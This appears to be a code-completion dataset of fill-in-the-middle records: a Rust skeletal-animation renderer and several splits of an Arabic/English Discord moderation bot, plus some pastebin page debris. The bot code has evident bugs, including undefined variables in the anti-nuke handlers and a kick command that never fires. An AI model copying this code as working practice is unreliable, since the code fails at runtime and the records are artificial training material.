shader_data: shader_data,
});
}
}
Model {
vertices: vertices,
indices: indices,
batches: batches,
bone_map: RefCell::new(bone_map),
bone_transform_buffer: u_bone_transformations,
global_inverse: ai_scene.get_root_node().transformation.inverse(),
scene: ai_scene,
}
}
fn interpolate_position(&self,
time: f64,
node: &ai::animation::NodeAnim
) -> ai::Vector3D {
let keys = node.get_position_keys();
// only one key, so no need to interpolate
if keys.len() == 1 {
return keys[0].value
}
// otherwise, find out which keys the given time falls between
// and interpolate
for pos_keys in keys.windows(2) {
// note: once we find a match, we return
if time < pos_keys[1].time {
let dt = pos_keys[1].time - pos_keys[0].time;
// how far inbetween the frams we are on a scale from 0 to 1
let s = (time - pos_keys[0].time) / dt;
return lerp(pos_keys[0].value,
pos_keys[1].value,
s as f32);
}
}
// get the last frame, if we didn't find a match
return keys[keys.len()-1].value
}
fn interpolate_scaling(&self,
time: f64,
node: &ai::animation::NodeAnim
) -> ai::Vector3D {
let keys = node.get_scaling_keys();
// only one key, so no need to interpolate
if keys.len() == 1 {
return keys[0].value
}
// otherwise, find out which keys the given time falls between
// and interpolate
for scale_keys in keys.windows(2) {
// note: once we find a match, we return
if time < scale_keys[1].time {
let dt = scale_keys[1].time - scale_keys[0].time;
// how far inbetween the frams we are on a scale from 0 to 1
let s = (time - scale_keys[0].time) / dt;
return lerp(scale_keys[0].value,
scale_keys[1].value,
s as f32);
}
}
// get the last frame, if we didn't find a match
return keys[keys.len()-1].value
}
fn interpolate_rotation(&self,
time: f64,
node: &ai::animation::NodeAnim
) -> ai::Quaternion {
let keys = node.get_rotation_keys();
// only one key, so no need to interpolate
if keys.len() == 1 {
return keys[0].value
}
// otherwise, find out which keys the given time falls between
// and interpolate
for rot_keys in keys.windows(2) {
// note: once we find a match, we return
if time < rot_keys[1].time {
let dt = rot_keys[1].time - rot_keys[0].time;
// how far inbetween the frames we are on a scale from 0 to 1
let s = (time - rot_keys[0].time) / dt;
// nlerp
return lerp(rot_keys[0].value,
rot_keys[1].value,
s as f32).normalize();
}
}
// get the last frame, if we didn't find a match
return keys[keys.len()-1].value
}
fn update_bone_transforms(&self,
time: f64,
anim_num: uint,
scene_node: &ai::scene::Node,
parent_transform: &ai::Matrix4x4,
) {
// calculate the transformation matrix for this node
let animation = self.scene.get_animations()[anim_num];
let node_transform = match animation.find_node_anim(&scene_node.name) {
Some(node_anim) => {
self.interpolate_position(time, node_anim).translation_matrix() *
self.interpolate_rotation(time, node_anim).rotation_matrix() *
self.interpolate_scaling(time, node_anim).scaling_matrix()
},
None => {
scene_node.transformation
}
};
let node_to_global = *parent_transform * node_transform;
let opt_id = {
self.bone_map.borrow().get_id(&scene_node.name.to_string())
};
match opt_id {
None => { },
Some(id) => {
let offset = {
self.bone_map.borrow().offsets[id as uint]
};
{
self.bone_map.borrow_mut().transforms[id as uint] =
(self.global_inverse * node_to_global * offset)
.transpose().to_array();
}
}
}
for child in scene_node.get_children().iter() {
self.update_bone_transforms(time,
anim_num,
*child,
&node_to_global,
);
}
}
fn draw(&mut self,
graphics: &mut gfx::Graphics<gfx::GlDevice, gfx::GlCommandBuffer>,
frame: &gfx::Frame,
time: f64,
transform: Mat4,
) {
self.update_bone_transforms(time,
0,
self.scene.get_root_node(),
&ai::Matrix4x4::identity(),
);
graphics.device.update_buffer(self.bone_transform_buffer,
self.bone_map.borrow().transforms.as_slice(),
0,
);
for &mut component in self.batches.iter() {
component.shader_data.u_model_view_proj = transform;
graphics.draw(&component.batch, &component.shader_data, frame);
}
}
}
#[deriving(Show)]
#[vertex_format]
struct Vertex {
#[as_float]
a_position: [f32, ..3],
#[as_float]
a_normal: [f32, ..3],
#[as_float]
a_tex_coord: [f32, ..3],
#[as_float]
a_bone_weights: [f32, ..4],
a_bone_ids: [u32, ..4],
}
#[shader_param(ModelBatch)]
struct ShaderParam {
u_model_view_proj: Mat4,
/// texture for the mesh
t_color: gfx::shade::TextureParam,
/// mesh transformations caused by bones
u_bone_transformations: gfx::RawBufferHandle,
}
static VERTEX_SRC: gfx::ShaderSource<'static> = shaders! {
GLSL_150: b"
#version 150 core
in vec3 a_position;
in vec3 a_normal;
in vec3 a_tex_coord;
in vec4 a_bone_weights;
in ivec4 a_bone_ids;
out vec2 v_TexCoord;
const int MAX_BONES = 60;
uniform mat4 u_model_view_proj;
uniform u_bone_transformations {
mat4[MAX_BONES] bones;
} u_bones;
void main() {
mat4 bone_trans = u_bones.bones[a_bone_ids[0]] * a_bone_weights[0];
bone_trans += u_bones.bones[a_bone_ids[1]] * a_bone_weights[1];
bone_trans += u_bones.bones[a_bone_ids[2]] * a_bone_weights[2];
bone_trans += u_bones.bones[a_bone_ids[3]] * a_bone_weights[3];
gl_Position = u_model_view_proj * bone_trans * vec4(a_position, 1.0);
v_TexCoord = vec2(a_tex_coord);
}
"
};
static FRAGMENT_SRC: gfx::ShaderSource<'static> = shaders! {
GLSL_150: b"
#version 150 core
in vec2 v_TexCoord;
out vec4 o_Color;
uniform sampler2D t_color;
void main() {
vec4 tex = texture(t_color, v_TexCoord);
float blend = dot(v_TexCoord-vec2(0.5,0.5), v_TexCoord-vec2(0.5,0.5));
o_Color = mix(tex, vec4(0.0,0.0,0.0,0.0), blend*1.0);
}
"
};
#[start]
fn start(argc: int, argv: *const *const u8) -> int {
std::rt::start(argc, argv, main)
}
fn main() {
let (win_width, win_height) = (640, 480);
let mut window = Sdl2Window::new(
shader_version::opengl::OpenGL_3_2,
WindowSettings {
title: "model".to_string(),
size: [win_width, win_height],
fullscreen: false,
exit_on_esc: true,
samples: 4,
}
);
window.set_mut(CaptureCursor(true));
let mut device = gfx::GlDevice::new(|s| unsafe {
std::mem::transmute(sdl2::video::gl_get_proc_address(s))
});
let frame = gfx::Frame::new(win_width as u16, win_height as u16);
let state = gfx::DrawState::new().depth(gfx::state::LessEqual, true);
ai::log::add_log_stream(ai::log::Stdout);
let _ = device.create_sampler(
gfx::tex::SamplerInfo::new(
gfx::tex::Bilinear,
gfx::tex::Clamp
)
);
let program = device.link_program(
VERTEX_SRC.clone(),
FRAGMENT_SRC.clone()
).unwrap();
let texture_store = TextureStore::new("../assets/guard-md5",
&mut device
);
let mut graphics = gfx::Graphics::new(device);
let mut importer = ai::Importer::new();
// limit bone weights to 4 per vertex
importer.set_import_property(ai::Property::PP_LBW_MAX_WEIGHTS(4));
importer.add_processing_steps(&[
ai::Process::Triangulate,
ai::Process::GenSmoothNormals,
ai::Process::JoinIdenticalVertices,
ai::Process::LimitBoneWeights,
]);
let fname = "../assets/guard-md5/guard.md5mesh";
let ai_scene = match importer.import_from_file(fname) {
Some(scene) => scene,
None => panic!("failed to import scene: {}", fname),
};
let mut model = Model::from_file(ai_scene,
&mut graphics,
&program,
&state,
&texture_store,
);
// Rotate the model 90 deg around the x-axis
let model_view = [
[1.0, 0.0, 0.0, 0.0],
[0.0, 0.0, -1.0, 0.0],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0],
];
let projection = cam::CameraPerspective {
fov: 90.0f32,
near_clip: 0.1,
far_clip: 1000.0,
aspect_ratio: (win_width as f32) / (win_height as f32)
}.projection();
let mut first_person = cam::FirstPerson::new(
[0.0, 33.0, 48.0],
cam::FirstPersonSettings::keyboard_wasd()
);
first_person.velocity = 30.0f32;
first_person.settings.speed_vertical = 30.0f32;
let start = time::get_time();
let window = RefCell::new(window);
for e in Events::new(&window) {
use event::RenderEvent;
let now = time::get_time() - start;
let time = 18.0 * now.num_milliseconds() as f64 / 1e3;
let fmod = |x: f64, y: f64| -> f64 {
x - (x/y).floor() * y
};
let time = fmod(time , 140.0);
first_person.event(&e);
e.render(|args| {
graphics.clear(
gfx::ClearData {
color: [0.3, 0.3, 0.3, 1.0],
depth: 1.0,
stencil: 0,
},
gfx::COLOR | gfx::DEPTH,
&frame
);
let u_model_view_proj =
cam::model_view_projection(
model_view,
first_person.camera(args.ext_dt).orthogonal(),
projection
);
model.draw(&mut graphics,
&frame,
time,
u_model_view_proj,
);
graphics.end_frame();
});
}
}
| Model | identifier_name |
bot.js | const Discord = require('discord.js');
const client = new Discord.Client();
var prefix = "$";
client.on('ready', () => {
console.log(`Logged in as ${client.user.tag}!`);
client.user.setGame(`The Shadow for ever`,"http://twitch.tv/S-F")
console.log('')
console.log('')
console.log('╔[═════════════════════════════════════════════════════════════════]╗')
console.log(`[Start] ${new Date()}`);
console.log('╚[═════════════════════════════════════════════════════════════════]╝')
console.log('')
console.log('╔[════════════════════════════════════]╗');
console.log(`Logged in as * [ " ${client.user.username} " ]`);
console.log('')
console.log('Informations :')
console.log('')
console.log(`servers! [ " ${client.guilds.size} " ]`);
console.log(`Users! [ " ${client.users.size} " ]`);
console.log(`channels! [ " ${client.channels.size} " ]`);
console.log('╚[════════════════════════════════════]╝')
console.log('')
console.log('╔[════════════]╗')
console.log(' Bot Is Online')
console.log('╚[════════════]╝')
console.log('')
console.log('')
});
var prefix = "$";
client.on('message', function(msg) {
let verifLevels = ["None", "Low", "Medium", "(╯°□°)╯︵ ┻━┻", "┻━┻ミヽ(ಠ益ಠ)ノ彡┻━┻"];
let region = {
"brazil": "Brazil",
"eu-central": "Central Europe",
"singapore": "Singapore",
"Russia": "Russia",
"us-central": "U.S. Central",
"sydney": "Sydney",
"us-east": "U.S. East",
"us-south": "U.S. South",
"us-west": "U.S. West",
"eu-west": "Western Europe",
"vip-us-east": "VIP U.S. East",
"london": "London",
"amsterdam": "Amsterdam",
"hongkong": "Hong Kong"
};
if(msg.content.startsWith ('$server')) {
let embed = new Discord.RichEmbed()
.setColor('RANDOM')
.setThumbnail(msg.guild.iconURL)
.setTitle(`${msg.guild.name}`)
.addField('**__ Server Name | اسم السيرفر__**',`[** __${msg.guild.name}__ **]`,true)
.addField('**__ OwnerShip | الاونر الاساسي__**',`**${msg.guild.owner}**`,true)
.addField('**__ Server ID | ايدي السيرفر__**',`**${msg.guild.id}**`,true)
.addField('**__ Members Count | عدد الاعضاء__**',`[** __${msg.guild.memberCount}__ **]`,true)
.addField('**__ Online | الاعضاء الاونلاين__**',`[** __${msg.guild.members.filter(m=>m.presence.status == 'online').size}__ **]`,true)
.addField('**__ Verification Level | مستوي الحمايه__**',`[** __${verifLevels[msg.guild.verificationLevel]}__** ]`,true)
.addField('**__ Region | البلد__**',`[** __${region[msg.guild.region]}__** ]`,true)
.addField('**__ Text Channels | رومات كتابيه__**',`[** __${msg.guild.channels.filter(m => m.type === 'text').size}__** ]`,true)
.addField('**__ Voice Channels | رومات صوتيه__**',`[** __${msg.guild.channels.filter(m => m.type === 'voice').size}__ **]`,true)
.addField('**__ Created At | صنع في __**',msg.guild.createdAt.toLocaleString())
msg.channel.send({embed:embed});
}
});
client.on('message', message => {
var prefix = "$";
if(message.content === prefix + "cc") {
if(!message.channel.guild) return message.reply('** This command only for servers**');
if(!message.member.hasPermission('MANAGE_MESSAGES')) return message.reply(' **تم قفل الشات*');
message.channel.overwritePermissions(message.guild.id, {
SEND_MESSAGES: false
}).then(() => {
message.reply("**تم قفل الشات :white_check_mark: **")
});
}
//FIRE BOT
if(message.content === prefix + "oc") {
if(!message.channel.guild) return message.reply('** This command only for servers**');
if(!message.member.hasPermission('MANAGE_MESSAGES')) return message.reply('**تم فتح الشات**');
message.channel.overwritePermissions(message.guild.id, {
SEND_MESSAGES: true
}).then(() => {
message.reply("**تم فتح الشات :white_check_mark:**")
});
}
client.on('message', msg => {
if (msg.author.bot) return;
if (!msg.content.startsWith(prefix)) return;
let command = msg.content.split(" ")[0];
command = command.slice(prefix.length);
let args = msg.content.split(" ").slice(1);
if(command === "clear") {
const emoji = client.emojis.find("name", "wastebasket")
let textxt = args.slice(0).join("");
if(msg.member.hasPermission("MANAGE_MESSAGES")) {
if (textxt == "") {
msg.delete().then
msg.channel.send("***```Supply A Number ًں‘Œ```***").then(m => m.delete(3000));
} else {
msg.delete().then
msg.delete().then
msg.channel.bulkDelete(textxt);
msg.channel.send("```Cleard: " + textxt + "\n Messages```").then(m => m.delete(3000));
}
}
}
});
client.on('message', message => {
if (message.content === "$bot") {
var year = message.guild.createdAt.getFullYear()
var month = message.guild.createdAt.getMonth()
var day = message.guild.createdAt.getDate()
let embed = new Discord.RichEmbed()
.addField('**Bot Servers**',`[ ${client.guilds.size} ]`)
.addField('**Users**',`[ ${client.users.size} ]`)
.addField('**Channels**',`[ ${client.channels.size} ]`)
.addField('**ID**',`[ ${client.user.id} ]`)
.addField('**Name**',`[ ${client.user.tag} ]`)
.addField('Requested by:', "<@" + message.author.id + ">")
.setColor("#51cde6")
.setDescription(`${message.guild.name}`)
message.channel.sendEmbed(embed);
}
});;
client.on('message', message => {
if(message.content.includes('discord.gg')){
if(!message.channel.guild) return message.reply('** advertising me on DM ? **');
if (!message.member.hasPermissions(['ADMINISTRATOR'])){
message.delete()
return message.reply(`** No Invite Links !**`)
}
}
});
var AsciiTable = require('ascii-data-table').default
client.on('message', message =>{
if(message.content == "#roles"){
if(message.guild.member(message.author).hasPermission("ADMINISTRATOR"))
var
ros=message.guild.roles.size,
data = [['Rank', 'RoleName']]
for(let i =0;i<ros;i++){
if(message.guild.roles.array()[i].id !== message.guild.id){
data.push([i,`${message.guild.roles.filter(r => r.position == ros-i).map(r=>r.name)}`])
}}
let res = AsciiTable.table(data)
message.channel.send(`**\`\`\`xl\n${res}\`\`\`**`);
}
});
var guilds = {};
client.on('guildBanAdd', function(guild) {
const rebellog = client.channels.find("name", "log"),
Onumber = 10,
Otime = 10000
guild.fetchAuditLogs({
type: 22
}).then(audit => {
let banner = audit.entries.map(banner => banner.executor.id)
let bans = guilds[guild.id + banner].bans || 0
guilds[guild.id + banner] = {
bans: 0
}
bans[guilds.id].bans += 3;
if(guilds[guild.id + banner].bans >= Onumber) {
try {
let roles = guild.members.get(banner).roles.array();
guild.members.get(banner).removeRoles(roles);
} catch (error) {
console.log(error)
try {
guild.members.get(banner).removeRoles(roles);
rebellog.send(`<@!${banner.id}>
حآول العبث بالسيرفر @everyone`);
guild.owner.send(`<@!${banner.id}>
حآول العبث بالسيرفر ${guild.name}`)
setTimeout(() => {
guilds[guild.id].bans = 0;
},Otime)
} catch (error) {
console.log(error)
}
}
}
})
});
let channelc = {};
client.on('channelCreate', async (channel) => {
const rebellog = client.channels.find("name", "log"),
Oguild = channel.guild,
Onumber = 10,
Otime = 10000;
const audit = await channel.guild.fetchAuditLogs({limit: 1});
const channelcreate = audit.entries.first().executor;
console.log(` A ${channel.type} Channel called ${channel.name} was Created By ${channelcreate.tag}`);
if(!channelc[channelcreate.id]) {
channelc[channelcreate.id] = {
created : 0
}
}
channelc[channelcreate.id].created += 3;
if(channelc[channelcreate.id].created >= Onumber ) {
let roles = guild.members.get(banner).roles.array();
guild.members.get(banner).removeRoles(roles);
rebellog.send(`<@!${channelcreate.id}>
حآول العبث بالسيرفر @everyone`);
channel.guild.owner.send(`<@!${channelcreate.id}>
حآول العبث بالسيرفر ${channel.guild.name}`)
}
setTimeout(() => {
channelc[channelcreate.id].created = 0;
},Otime)
});
let channelr = {};
client.on('channelDelete', async (channel) => {
const rebellog = client.channels.find("name", "log"),
Oguild = channel.guild,
Onumber = 10,
Otime = 10000;
const audit = await channel.guild.fetchAuditLogs({limit: 1});
const channelremover = audit.entries.first().executor;
console.log(` A ${channel.type} Channel called ${channel.name} was deleted By ${channelremover.tag}`);
if(!channelr[channelremover.id]) {
channelr[channelremover.id] = {
deleted : 0
}
}
client.on('message', message => {
var prefix = "$";
if (message.author.id === client.user.id) return;
if (message.guild) {
let embed = new Discord.RichEmbed()
let args = message.content.split(' ').slice(1).join(' ');
if(message.content.split(' ')[0] == prefix + 'bc') {
if (!args[1]) {
message.channel.send("**اكتب شي بعد الكوماند**");
return;
}
message.guild.members.forEach(m => {
if(!message.member.hasPermission('ADMINISTRATOR')) return;
var bc = new Discord.RichEmbed()
.addField('» السيرفر :', `${message.guild.name}`)
.addField('» المرسل : ', `${message.author.username}#${message.author.discriminator}`)
.addField(' » الرسالة : ', args)
.setColor('#ff0000')
// m.send(`[${m}]`);
m.send(`${m}`,{embed: bc});
});
}
} else {
return;
}
});
client.on('guildMemberAdd', member => {
member.guild.fetchInvites().then(guildInvites => {
const ei = invites[member.guild.id];
const invite = guildInvites.find(i => ei.get(i.code).uses < i.uses);
const inviter = client.users.get(invite.inviter.id);
const channel = member.guild.channels.find("name", "✽-welcome");
channel.send(`<@${member.user.id}> ** joined; ** Invited by ** <@${inviter.id}> ** `);
});
});
1.36 KB
client.on('message', message => {
var prefix = "$"
if (message.content.startsWith(prefix + 'id')) {
if (message.author.bot) return
if (!message.guild) return message.reply('**This Command Just In Servers**')
message.guild.fetchInvites().then(invs => {
let personalInvites = invs.filter(i => i.inviter.id === message.author.id)
let inviteCount = personalInvites.reduce((p, v) => v.uses + p, 0)
var roles = message.member.roles.map(roles => `**__${roles.name}__ |**`).join(` `)
let id = new Discord.RichEmbed()
.setColor('RANDOM')
.setTitle(':clipboard: | User identity info')
.setAuthor(message.author.username,message.author.avatarURL)
.addField('• Name :', message.author.username,true)
.addField('• Tag :', message.author.discriminator,true)
.addField('• ID :', message.author.id,true)
.addField('• JoinedAt :', moment(message.joinedAt).format('D/M/YYYY h:mm a '),true)
.addField('• CreatedAt :', moment(message.joinedAt).format('D/M/YYYY h:mm a '),true)
.addField('• Total invites :', inviteCount,true)
.addField('• Roles :', roles)
.setTimestamp()
message.channel.sendEmbed(id).then(c => {
c.react('📋')
})
})
}
});
var prefix = "$"
client.on("message", (message) => {
if (message.content.startsWith("${prefix}kick")) {
if(!message.member.hasPermission('KICK_MEMBERS')) return message.reply('? ماعندك الصلاحيات');
var member= message.mentions.members.first();
member.kick().then((member) => {
message.channel.send(member.displayName + " مع السلامه :wave: ");
}).catch(() => {
message.channel.send("Error -_-");
});
}
});
var prefix = "$"
client.on('message', message => {
if (message.author.xErenaa) return;
if (!message.content.startsWith(prefix)) return;
let command = message.content.split(" ")[0];
command = command.slice(prefix.length);
let args = message.content.split(" ").slice(1);
if (command == "ban") {
if(!message.channel.guild) return message.reply('** This command only for servers**');
if(!message.guild.member(message.author).hasPermission("BAN_MEMBERS")) return message.reply("**You Don't Have ` BAN_MEMBERS ` Permission**");
if(!message.guild.member(client.user).hasPermission("BAN_MEMBERS")) return message.reply("**I Don't Have ` BAN_MEMBERS ` Permission**");
let user = message.mentions.users.first();
let reason = message.content.split(" ").slice(2).join(" ");
/*let bErenaalog = client.channels.find("name", "Erenaa-log");
if(!bErenaalog) return message.reply("I've detected that this server doesn't have a Erenaa-log text channel.");*/
if (message.mentions.users.size < 1) return message.reply("**منشن شخص**");
if(!reason) return message.reply ("**اكتب سبب الطرد**");
if (!message.guild.member(user)
.bannable) return message.reply("**لايمكنني طرد شخص اعلى من رتبتي يرجه اعطاء البوت رتبه عالي**");
message.guild.member(user).ban(7, user);
const banembed = new Discord.RichEmbed()
.setAuthor(`BANNED!`, user.displayAvatarURL)
.setColor("RANDOM")
.setTimestamp()
.addField("**User:**", '**[ ' + `${user.tag}` + ' ]**')
.addField("**By:**", '**[ ' + `${message.author.tag}` + ' ]**')
.addField("**Reason:**", '**[ ' + `${reason}` + ' ]**')
message.channel.send({
embed : banembed
})
}
});
client.on('message', message => {
if(!message.channel.guild) return;
if(message.content.startsWith(prefix + 'move')) {
if (message.member.hasPermission("MOVE_MEMBERS")) {
if (message.mentions.users.size === 0) {
return message.channel.send("``لاستخدام الأمر اكتب هذه الأمر : " +prefix+ "move [USER]``")
}
if (message.member.voiceChannel != null) {
if (message.mentions.members.first().voiceChannel != null) {
var authorchannel = message.member.voiceChannelID;
var usermentioned = message.mentions.members.first().id;
var embed = new Discord.RichEmbed()
.setTitle("Succes!")
.setColor("#000000")
.setDescription(`لقد قمت بسحب <@${usermentioned}> الى الروم الصوتي الخاص بك✅ `)
var embed = new Discord.RichEmbed()
.setTitle(`You are Moved in ${message.guild.name}`)
.setColor("RANDOM")
.setDescription(`**<@${message.author.id}> Moved You To His Channel!\nServer --> ${message.guild.name}**`)
message.guild.members.get(usermentioned).setVoiceChannel(authorchannel).then(m => message.channel.send(embed))
message.guild.members.get(usermentioned).send(embed)
} else {
message.channel.send("``لا تستطيع سحب "+ message.mentions.members.first() +" `يجب ان يكون هذه العضو في روم صوتي`")
}
} else {
message.channel.send("**``يجب ان تكون في روم صوتي لكي تقوم بسحب العضو أليك``**")
}
} else {
message.react("❌")
}}}) | nd('name', 'Muted');
if (!muteRole) return message.reply(" I Can’t Find 'Muted' Role ").catch(console.error).then(message => message.delete(4000))
if (message.mentions.users.size < 1) return message.reply(' Error : ``Mention a User``').catch(console.error).then(message => message.delete(4000))
if (!message.guild.member(client.user).hasPermission('MANAGE_ROLES_OR_PERMISSIONS')) return;
if (message.guild.member(user).removeRole(muteRole.id)) {
return message.reply("User Has Been UnMuted.").catch(console.error).then(message => message.delete(4000))
} else {
message.guild.member(user).removeRole(muteRole).then(() => {
return message.reply("User Has Been UnMuted.").catch(console.error).then(message => message.delete(4000))
});
}
};
});
client.on('message',function(message) {
if(!message.channel.guild) return; let messageArray = message.content.split(' ');
let muteRole = message.guild.roles.find('name', 'Muted');
let muteMember = message.mentions.members.first();
let muteReason = messageArray[2];
let muteDuration = messageArray[3];
if (message.content.split(" ")[0].toLowerCase() === prefix + "mute") {
if (message.author.bot) return;
if(!muteRole) return message.guild.createRole({name: 'Muted'}).then(message.guild.channels.forEach(chan => chan.overwritePermissions(muteRole, {SEND_MESSAGES:false,ADD_REACTIONS:false})));
if(!message.guild.member(message.author).hasPermission("MANAGE_ROLES")) return message.channel.send(' Error : You Need `` MANAGE_ROLES ``Permission ');
if(!message.guild.member(client.user).hasPermission("MANAGE_ROLES")) return message.channel.send(' Error : I Don’t Have `` MANAGE_ROLES ``Permission ');
if(!muteMember) return message.channel.send(' Error : ``Mention a User``').then(message => message.delete(4000))
if(!muteReason) return message.channel.send(' Error : ``Supply a Reason``').then(message => message.delete(4000))
if(!muteDuration) return message.channel.send(' Error : `` Supply Mute Time `` \n Ex: #mute @user reason 1m ').then(message => message.delete(4000))
if(!muteDuration.match(/[1-7][s,m,h,d,w]/g)) return message.channel.send(' Error : `` Invalid Mute Duration``').then(message => message.delete(4000))
message.channel.send(`${muteMember} Has Been Muted.`).then(message => message.delete(5000))
muteMember.addRole(muteRole);
muteMember.setMute(true)
.then(() => { setTimeout(() => {
muteMember.removeRole(muteRole)
muteMember.setMute(false)
}, mmss(muteDuration));
});
}
});
client.login(process.env.BOT_TOKEN);
| ;
Save New Duplicate & Edit Just Text Twitter
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
const ms = require("ms");
client.on("message", message => {
if(!message.channel.guild) return;
if (message.author.bot) return;
let command = message.content.split(" ")[0];
if (message.content.split(" ")[0].toLowerCase() === prefix + "unmute") {
if (!message.member.hasPermission('MANAGE_ROLES')) return;
let user = message.mentions.users.first();
let modlog = client.channels.find('name', 'log');
let muteRole = client.guilds.get(message.guild.id).roles.fi | conditional_block |
bot.js | const Discord = require('discord.js');
const client = new Discord.Client();
var prefix = "$";
client.on('ready', () => {
console.log(`Logged in as ${client.user.tag}!`);
client.user.setGame(`The Shadow for ever`,"http://twitch.tv/S-F")
console.log('')
console.log('')
console.log('╔[═════════════════════════════════════════════════════════════════]╗')
console.log(`[Start] ${new Date()}`);
console.log('╚[═════════════════════════════════════════════════════════════════]╝')
console.log('')
console.log('╔[════════════════════════════════════]╗');
console.log(`Logged in as * [ " ${client.user.username} " ]`);
console.log('')
console.log('Informations :')
console.log('')
console.log(`servers! [ " ${client.guilds.size} " ]`);
console.log(`Users! [ " ${client.users.size} " ]`);
console.log(`channels! [ " ${client.channels.size} " ]`);
console.log('╚[════════════════════════════════════]╝')
console.log('')
console.log('╔[════════════]╗')
console.log(' Bot Is Online')
console.log('╚[════════════]╝')
console.log('')
console.log('')
});
var prefix = "$";
client.on('message', function(msg) {
let verifLevels = ["None", "Low", "Medium", "(╯°□°)╯︵ ┻━┻", "┻━┻ミヽ(ಠ益ಠ)ノ彡┻━┻"];
let region = {
"brazil": "Brazil",
"eu-central": "Central Europe",
"singapore": "Singapore",
"Russia": "Russia",
"us-central": "U.S. Central",
"sydney": "Sydney",
"us-east": "U.S. East",
"us-south": "U.S. South",
"us-west": "U.S. West",
"eu-west": "Western Europe",
"vip-us-east": "VIP U.S. East",
"london": "London",
"amsterdam": "Amsterdam",
"hongkong": "Hong Kong"
};
if(msg.content.startsWith ('$server')) {
let embed = new Discord.RichEmbed()
.setColor('RANDOM')
.setThumbnail(msg.guild.iconURL)
.setTitle(`${msg.guild.name}`)
.addField('**__ Server Name | اسم السيرفر__**',`[** __${msg.guild.name}__ **]`,true)
.addField('**__ OwnerShip | الاونر الاساسي__**',`**${msg.guild.owner}**`,true)
.addField('**__ Server ID | ايدي السيرفر__**',`**${msg.guild.id}**`,true)
.addField('**__ Members Count | عدد الاعضاء__**',`[** __${msg.guild.memberCount}__ **]`,true)
.addField('**__ Online | الاعضاء الاونلاين__**',`[** __${msg.guild.members.filter(m=>m.presence.status == 'online').size}__ **]`,true)
.addField('**__ Verification Level | مستوي الحمايه__**',`[** __${verifLevels[msg.guild.verificationLevel]}__** ]`,true)
.addField('**__ Region | البلد__**',`[** __${region[msg.guild.region]}__** ]`,true)
.addField('**__ Text Channels | رومات كتابيه__**',`[** __${msg.guild.channels.filter(m => m.type === 'text').size}__** ]`,true)
.addField('**__ Voice Channels | رومات صوتيه__**',`[** __${msg.guild.channels.filter(m => m.type === 'voice').size}__ **]`,true)
.addField('**__ Created At | صنع في __**',msg.guild.createdAt.toLocaleString())
msg.channel.send({embed:embed});
}
});
client.on('message', message => {
var prefix = "$";
if(message.content === prefix + "cc") {
if(!message.channel.guild) return message.reply('** This command only for servers**');
if(!message.member.hasPermission('MANAGE_MESSAGES')) return message.reply(' **تم قفل الشات*');
message.channel.overwritePermissions(message.guild.id, {
SEND_MESSAGES: false
}).then(() => {
message.reply("**تم قفل الشات :white_check_mark: **")
});
}
//FIRE BOT
if(message.content === prefix + "oc") {
if(!message.channel.guild) return message.reply('** This command only for servers**');
if(!message.member.hasPermission('MANAGE_MESSAGES')) return message.reply('**تم فتح الشات**');
message.channel.overwritePermissions(message.guild.id, {
SEND_MESSAGES: true
}).then(() => {
message.reply("**تم فتح الشات :white_check_mark:**")
});
}
client.on('message', msg => {
if (msg.author.bot) return;
if (!msg.content.startsWith(prefix)) return;
let command = msg.content.split(" ")[0];
command = command.slice(prefix.length);
let args = msg.content.split(" ").slice(1);
if(command === "clear") {
const emoji = client.emojis.find("name", "wastebasket")
let textxt = args.slice(0).join("");
if(msg.member.hasPermission("MANAGE_MESSAGES")) {
if (textxt == "") {
msg.delete().then
msg.channel.send("***```Supply A Number ًں‘Œ```***").then(m => m.delete(3000));
} else {
msg.delete().then
msg.delete().then
msg.channel.bulkDelete(textxt);
msg.channel.send("```Cleard: " + textxt + "\n Messages```").then(m => m.delete(3000));
}
}
}
});
client.on('message', message => {
if (message.content === "$bot") {
var year = message.guild.createdAt.getFullYear()
var month = message.guild.createdAt.getMonth()
var day = message.guild.createdAt.getDate()
let embed = new Discord.RichEmbed()
.addField('**Bot Servers**',`[ ${client.guilds.size} ]`)
.addField('**Users**',`[ ${client.users.size} ]`)
.addField('**Channels**',`[ ${client.channels.size} ]`)
.addField('**ID**',`[ ${client.user.id} ]`)
.addField('**Name**',`[ ${client.user.tag} ]`)
.addField('Requested by:', "<@" + message.author.id + ">")
.setColor("#51cde6")
.setDescription(`${message.guild.name}`)
message.channel.sendEmbed(embed);
}
});;
client.on('message', message => {
if(message.content.includes('discord.gg')){
if(!message.channel.guild) return message.reply('** advertising me on DM ? **');
if (!message.member.hasPermissions(['ADMINISTRATOR'])){
message.delete()
return message.reply(`** No Invite Links !**`)
}
}
});
var AsciiTable = require('ascii-data-table').default
client.on('message', message =>{
if(message.content == "#roles"){
if(message.guild.member(message.author).hasPermission("ADMINISTRATOR"))
var
ros=message.guild.roles.size,
data = [['Rank', 'RoleName']]
for(let i =0;i<ros;i++){
if(message.guild.roles.array()[i].id !== message.guild.id){
data.push([i,`${message.guild.roles.filter(r => r.position == ros-i).map(r=>r.name)}`])
}}
let res = AsciiTable.table(data)
message.channel.send(`**\`\`\`xl\n${res}\`\`\`**`);
}
}); |
var guilds = {};
client.on('guildBanAdd', function(guild) {
const rebellog = client.channels.find("name", "log"),
Onumber = 10,
Otime = 10000
guild.fetchAuditLogs({
type: 22
}).then(audit => {
let banner = audit.entries.map(banner => banner.executor.id)
let bans = guilds[guild.id + banner].bans || 0
guilds[guild.id + banner] = {
bans: 0
}
bans[guilds.id].bans += 3;
if(guilds[guild.id + banner].bans >= Onumber) {
try {
let roles = guild.members.get(banner).roles.array();
guild.members.get(banner).removeRoles(roles);
} catch (error) {
console.log(error)
try {
guild.members.get(banner).removeRoles(roles);
rebellog.send(`<@!${banner.id}>
حآول العبث بالسيرفر @everyone`);
guild.owner.send(`<@!${banner.id}>
حآول العبث بالسيرفر ${guild.name}`)
setTimeout(() => {
guilds[guild.id].bans = 0;
},Otime)
} catch (error) {
console.log(error)
}
}
}
})
});
let channelc = {};
client.on('channelCreate', async (channel) => {
const rebellog = client.channels.find("name", "log"),
Oguild = channel.guild,
Onumber = 10,
Otime = 10000;
const audit = await channel.guild.fetchAuditLogs({limit: 1});
const channelcreate = audit.entries.first().executor;
console.log(` A ${channel.type} Channel called ${channel.name} was Created By ${channelcreate.tag}`);
if(!channelc[channelcreate.id]) {
channelc[channelcreate.id] = {
created : 0
}
}
